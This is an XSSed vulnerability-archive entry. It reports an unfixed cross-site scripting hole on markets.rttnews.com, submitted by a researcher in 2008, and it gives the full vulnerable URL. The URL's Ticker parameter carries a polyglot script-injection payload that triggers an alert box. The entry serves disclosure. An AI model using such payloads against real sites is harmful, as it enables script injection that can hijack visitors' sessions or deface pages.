Unfixed XSS vulnerability at markets.rttnews.com

2008-06-18T00:00:00
ID XSSED:42599
Type xssed
Reporter crashbird
Modified 2009-10-06T00:00:00

Description

Security researcher crashbird, has submitted on 18/06/2008 a cross-site-scripting (XSS) vulnerability affecting markets.rttnews.com, which at the time of submission ranked 40166 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://markets.rttnews.com/rttnews?Page=QUOTE&Ticker=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E